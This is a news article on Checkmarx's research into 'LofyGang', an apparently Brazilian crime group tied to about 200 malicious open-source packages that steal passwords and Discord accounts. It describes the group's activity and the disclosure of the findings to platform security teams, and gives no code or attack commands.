A number of notable software supply chain cyber incidents have been linked to ‘LofyGang,’ an attack group that has been operating for over a year, according to a new analysis by Checkmarx.
The researchers discovered around 200 malicious packages with thousands of installations linked to LofyGang. These included several classes of malicious payloads, general password stealers and Discord–specific persistent malware.
“Some were embedded inside the package, and some downloaded the malicious payload during runtime from c2 servers,” stated Checkmarx.
Some of those packages were found to have been recorded in three different incident reports this year by Sonatype, Jfrog and Securelist. However, “that was just a small piece of this larger puzzle.”
Through observing LofyGang’s activities across the internet, the Checkmarx team concluded it was an organized crime group focused on stealing and sharing stolen credit cards, gaming, streaming accounts (e.g., Disney) and more.
The investigation looked at LofyGang’s Discord server, which was created on October 31, 2021. This communication channel includes technical support for the group's hacking tools, a dark meme group and a dedicated bot responsible for a giveaway of Discord Nitro updates.
It is also hosting hack tools under the GitHub account 'PolarLofy,' while its open–source repositories offer tools and bots for Discord.
The researchers observed LofyGang operators posting to an underground hacking community under the alias 'DyPolarLofy,' where they leak thousands of Disney+ and Minecraft accounts and promote their hacking tools and bots.
LofyGang even has its own YouTube channel, where it promotes content such as demonstrating how to use its hacking tools.
The researchers believe the group’s origin is Brazil due to the use of Brazilian Portuguese sentences and the discovery of a file called ‘brazil.js,’ which contained malware found in a few of its malicious packages.
In September 2022, Sonatype revealed it had detected a 700% rise in malicious packages in various open–source repositories over the past year. In the same month, the Microsoft Threat Intelligence Center (MSTIC) published an advisory stating that threat actors associated with North Korea had been spotted weaponizing legitimate open–source software targeting employees in organizations across multiple industries.
Checkmarx concluded: “The surge of recent open–source supply chain attacks teaches us that cyber–attackers have realized that abusing the open–source ecosystem represents an easy way to increase the effectiveness of their attacks. Communities are being formed around utilizing open–source software for malicious purposes. We believe this is the start of a trend that will increase in the coming months.”
Checkmarx added that it had disclosed its findings to the security teams of GitHub, NPM, Repl.it, Discord and more.